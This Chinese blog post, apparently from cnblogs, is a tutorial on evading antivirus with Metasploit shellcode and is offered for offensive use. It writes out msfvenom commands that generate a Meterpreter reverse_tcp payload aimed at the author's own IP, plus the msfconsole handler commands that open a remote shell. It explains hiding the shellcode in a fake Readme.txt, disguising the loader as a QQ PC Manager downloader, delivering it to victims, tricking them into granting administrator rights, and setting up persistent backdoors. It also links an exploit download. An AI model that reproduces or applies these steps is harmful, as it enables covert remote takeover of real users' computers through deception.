• shellcode超级免杀


    shellcode超级免杀

    作者声明: 本文章属于作者原创,不能转载,违反网络安全法自己承担.这里只供学习使用.
    日期: 2019-12-31
    实验视频链接: https://www.youtube.com/watch?v=TVN3AOsgvA8&list=PLHxmmOLhBykSVS5buN9VZbhjMR-8K0e34&index=3&t=739s

    我试过了电脑管家,火绒安全,McAfee,360, 但只有360使用手动云查杀时木马才能查出来 (目前所有软件都无法查杀!!!!! 2020-1-2)
    从2019-12-29日早上起,我向我的PE-tools工具里写了一个功能,就是shellcode注入功能,写好之后,发现虽然shellcode能注入,但是不能免杀,于是采用各种加密技巧,还是没能逃脱火绒,我绞尽脑汁的想,使用dll注入,dll注入虽然能逃脱免杀,payload反弹时,可是不能交互了.我就采用一种更笨的方法,就是程序运行时加载一下shellcode文件,试了一下成功免杀.好废话不多说,咱们开始!!!!

    效果图

    enter image description here

    演示:

    环境

    Kali (攻击机)
    Win10 (受害机 且安装有各种杀毒软件)
    WinXp (辅助机,只是用来编译源码的)
    

    如何免杀

    免杀效果其实很简单,就是程序启动后加载文件动态运行里面写好的shellcode即可.
    而且还方便替换shellcode不用编译,直接替换文本文件内容即可,且还可以伪装为Readme.txt文件
    可以向Readme.txt乱填入一些声明,将shellcode进行排版,以防被发现..
    可以借助一些软件进行编译你的加载器,修改图标即大小,让对方毫无怀疑...
    

    生成shellcode:

    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c
    lhost后面就是我本地的ip, lport后面时指定的一个端口号.指定好之后,会生成shellcode如下图:
    

    enter image description here

    将生成的shellcode复制粘贴到一个文件里,你也可以直接使用
    msfvenom -p windows/meterpreter/reverse_tcp lhost=10.23.92.9 lport=5555 -f c > a.txt
    那shellcode放在了a.txt文件中了,代开看也更上图一模一样.
    

    写入shellcode:

    得到shellcode之后,我先进行操作,涉及到加载器的源码,我会把它放在末尾来说:
    使用我已经编译后的一个仿真电脑管家下载器,如图:
    

    enter image description here

    一个文件是模拟电脑管家下载器的一个软件,是我编译好的一个文件,后面我会讲它的简单原理与制作
    另一个 Readme.txt就是我们放置shellcode的文件
    我向Readme.txt里写入了一些东西,可以让下载的人这东西只是用来声明的,如图
    

    enter image description here

    使劲回车,然后将自己的shellcode复制到该文件.
    

    enter image description here

    这里我把shellcode藏在了该文件的底部,一般人它也只读前面,后面不会看,看到了也不知道那是啥玩意..
    复制好之后,想方设法将这两个文件仍到你的目标,有很多方法,就不多说了..
    

    实施攻击:

    假如对方已经拿到了,该软件,如图:
    

    enter image description here

    从这里可以知道,静态的反杀已经OK,昨天使用的各种加密手段,还是没能逃脱火绒的魔抓,这个方法还可以,看一下Readme.txt
    

    enter image description here

    往下拉看一下shellcode:
    

    enter image description here

    如果觉得shellcode太显眼,你可以对它进行base64加解密就行.
    
    在kali中输入 msfconsole
    进入之后如图:
    

    enter image description here

    依次输入以下命令
    #msf5> use exploit/multi/handler
    #msf5> set payload windows/meterpreter/reverse_tcp
    #msf5> set lhost ip   (这里填你的攻击机上的ip) 
    #msf5> set lport port (这里填生成shellcode时的端口)
    #msf5> exploit -j    (后台监听)
    
    如图:
    

    enter image description here

    当对方点击QQPCDownload运行时即可得到shell.
    

    enter image description here

    看到了一个session 开启了输入 session -i 1 (1就是开启号) 进行交互.输入sysinfo
    

    enter image description here

    咱们使用火绒来边扫描边控制吧...
    

    enter image description here

    可以看到,完全杀不到.....好了演示结束,接下来就是讲讲加载器咋写吧.
    

    加载器咋写:

        根据网络安全法律,不公布
    

    伪装

    可以使用,extraicohs工具提取任意一个exe文件的图标,提取之后,在vc6中添加图标进行编译
    然后再使用我开发的一个工具调整一下加载器的大小.
    

    enter image description here
    我做了几个游戏,游戏里就包含了木马,然对方直接不知道这个有病毒.还有一种方式更加伪装.
    分享啥啥源码,比如我做的一个贪吃蛇游戏,若对方得到源码,只要对方编译运行,即可中招..
    为了安全着想,我不分享我做的木马....,但原理我已经说了,十分简单..
    可以提取如图:

    enter image description here

    使用Pe_tools增加大小, 如图:
    

    enter image description here

    写入到c盘,若为win10电脑,写入到其他磁盘.
    

    enter image description here

    实现可以控制任意一台中木马的电脑.

    买一个服务器,选择debian,然后安装metasploit框架,既可以实现控制任意一台中木马的电脑....
    

    如何获取管理员权限

        侵入对方后,看一下他的安全软件,然后使用木马冒充安全软件,在开发木马时,设置一下运行的权限为管理员即可
        然后运行该木马,这时就会出现一个管理员权限的请求,一般情况下,用户都很信任安全软件获取管理员权限,则点击是.
        然后c盘随你玩了
    

    如何设置后门

        要想实现长期控制,就得给对方上传开机自的木马...,我已经做好了,且根据对方的杀毒软件做的一个白加黑.
        杀毒软件和使用者毫无察觉,为了不让自己进局子,我不会发给别人..
    

    源码下载 + 测试文件:

    实验工具下载: https://files-cdn.cnblogs.com/files/lyxf/exploit.zip
  • 相关阅读:
    调用https接口 报错:unable to find valid certification path
    POI生成Excel
    杂七杂八记录
    maven 打jar 包 pom.xml配置
    IDEA 全局修改项目版本
    Spring AOP的内部调用问题
    redis 中文乱码
    windows redis cluster 配置
    spring事物失效场景
    Mybatis常用示例
  • 原文地址:https://www.cnblogs.com/lyxf/p/12124925.html
Copyright © 2020-2023  润新知